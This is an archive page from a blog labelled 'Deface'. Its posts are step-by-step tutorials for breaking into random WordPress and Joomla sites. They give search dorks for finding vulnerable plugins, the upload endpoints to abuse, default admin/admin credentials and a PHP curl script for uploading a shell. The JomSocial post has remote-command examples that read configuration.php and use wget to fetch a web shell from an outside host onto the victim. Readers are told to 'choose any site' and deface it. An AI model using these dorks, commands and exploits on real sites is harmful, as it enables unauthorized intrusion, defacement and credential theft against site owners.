Affichage des articles dont le libellé est Deface. Afficher tous les articles
Affichage des articles dont le libellé est Deface. Afficher tous les articles

[DEFACE] How To Deface with WordPress Reflex Gallery




Tutorial GhostBin : Click [ GHOSTBIN ]
Tutorial YouTube : Click [ Youtube ]

- DUR74N4
Read more

by Malik korrich ~ vendredi 3 avril 2015 0 commentaires

[DEFACE] How To Deface with Formcraft



Ghostbin Tutorial : https://ghostbin.com/paste/rauxf
Youtube Tutorial : https://www.youtube.com/watch?v=JLQjcgSZ1dE

- Dork : "powered by formcraft" use ur brain for the new dork :D
- exploit : /wp-content/plugins/formcraft/file-upload/server/php/upload.php
- Accses the shell / file : /wp-content/plugins/formcraft/file-upload/server/php/files/[randomcode]--nameshell.php

Happy Deface ^_^
Read more

by Malik korrich ~ lundi 16 février 2015 0 commentaires

[JOOMLA] JomSocial 2.6 Remote Code Execution



Dork:
inurl:/index.php?option=com_community
Procedure
   1- Copy the dork and paste it on Google or any other search engine
   2- Chose any site
   3- Run the JomSocial Exploiter by Gothie
   4- Paste the site URL in the given textbox and click Connect
   5-If site is vulnerable, you will get the message as below

   6- Now, you can execute any command remotely. The commands are as below:
system('id & uname -a');
 system('ls');
system('cat configuration.php');
    7- To upload shell, you need to have raw shell (shell.txt) uploaded anywhere and can be access directly without executing it. Type in the command below to import your shell and save it as .php
system('wget http://socialmediasuccesstools.com/shell.txt -O shell.php');
   8- Your shell can be found at http://victim.com/shell.php


Downloads
JomSocial Exploiter by Gothie (2.7MB) 
Read more

by Malik korrich ~ mercredi 29 octobre 2014 0 commentaires

XSS Vulnerability

Dork:
inurl:"/showcatrows.php?CategoryID="
Exploit:
">

HaCked By NEXUS

 
./ NEXUS 
Read more

by Malik korrich ~ mercredi 25 juin 2014 0 commentaires

Exploit Elfinder - Shell Upload Vulnerability


Dork:
inurl:/elfinder/ intitle:index of
Steps:
1- Copy the dork and paste in google

2- Choose any site

3- Find for elfinder.html or elfinder.php.html

   

4- Upload your file





5- If your file successfully uploaded, it will be in the same directory. Double click on your file to see its result





Thats all :)
Read more

by Malik korrich ~ dimanche 22 juin 2014 0 commentaires

Shop737 - File Upload Vulnerabilities



Finding Vulnerable Target

Dork: intext:"Powered by Shop737"

1- Copy and paste this dork on Google.

2- Choose any site as your target.

3- Once you clicked on your target, you will see something like this,




Exploiting Target

1- To enable upload mode, you need to change a little bit the website URL.

Change index.php to upload.php


Example :

http://asdijateng.org/poto/index.php?

to

http://asdijateng.org/poto/upload.php


Hit enter and you will get an admin login prompt,





2- Simply enter the username and password as below:

User Name : admin
Password : admin


3- After you click Log In , you will get something like this,



4- As you can see, there is "Buat kategori baru:" , fill in the field your new category name as you like :)

Below the text, there is "Keterangan kategori:" , just leave it empty and just click  the "Buat Kategori" button.





5- Or you can just simply browse your file and click upload.

6- If your file is successfully uploaded, it will be in directory /poto/[category_name]/yourfile.txt

 Example:
www.site.com/poto/kd.txt
www.site.com/poto/bcc/kd.txt
Read more

by Malik korrich ~ 0 commentaires

Exploit Joomla!: JCE


It has been a very long time that i haven't post here, so as for today i'm going to post a new tutorial on how to upload shell with method JCE.

Thing Required:
JCE Exploiter : DOWNLOAD 

DORKS:
 inurl:"images/stories" php
"index of /images/stories/powered_by.png"
"index of /images/stories/joomla-dev_cycle.png"
"index of /images/stories/food"
"index of /images/stories/fruit"
inurl:"/images/stories/food"
inurl:"/images/stories/fruit"
inurl:index.php?option=com_jce
inurl:index.php?option=com_virtuemart
inurl:joomla/index.php?option=com_virtuemart

Steps:
1- Copy any of the dorks, and paste on google





- Choose any site
  

3 - Open up JCE.exe




 4 - Paste the site that you chose in the textbox

 5 - Click on START

6 - If the shell successfully upload, you will get the link to the shell





7 - Go to the given url, and upload your shell

 
 Video



Video by Tentera Siber Legion

Read more

by Malik korrich ~ jeudi 19 juin 2014 0 commentaires

Exploit Wordpress:Complete Gallery Manager 3.3.3 - File Upload Vulnerability



Things Required:
-XAMPP
-Shell
-Exploit script.php

Dork: inurl/wp-content/plugins/complete-gallery-manager
Shell Uploaded to : http://wordpress.com/wp-content/2013/09/up.php

Exploit :


$uploadfile="up.php";
$ch =
curl_init("http://wordpress.localhost:8080/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>
Just watch the video if you still don't understand :)

 
Read more

by Malik korrich ~ jeudi 15 mai 2014 0 commentaires

Exploit Wordpress: Salespresspro Theme - File Upload Vulnerability







POC:
Dork: inurl:/themes/salespresspro
          inurl:/wp-content/themes/salespresspro/

Exploit: /wp-content/themes/salespresspro/headerimgbgblog-upload.php  

This exploit is the same as the previous exploit that i posted, please check them if you can't understand.

  
Read more

by Malik korrich ~ 0 commentaires

« Articles plus anciens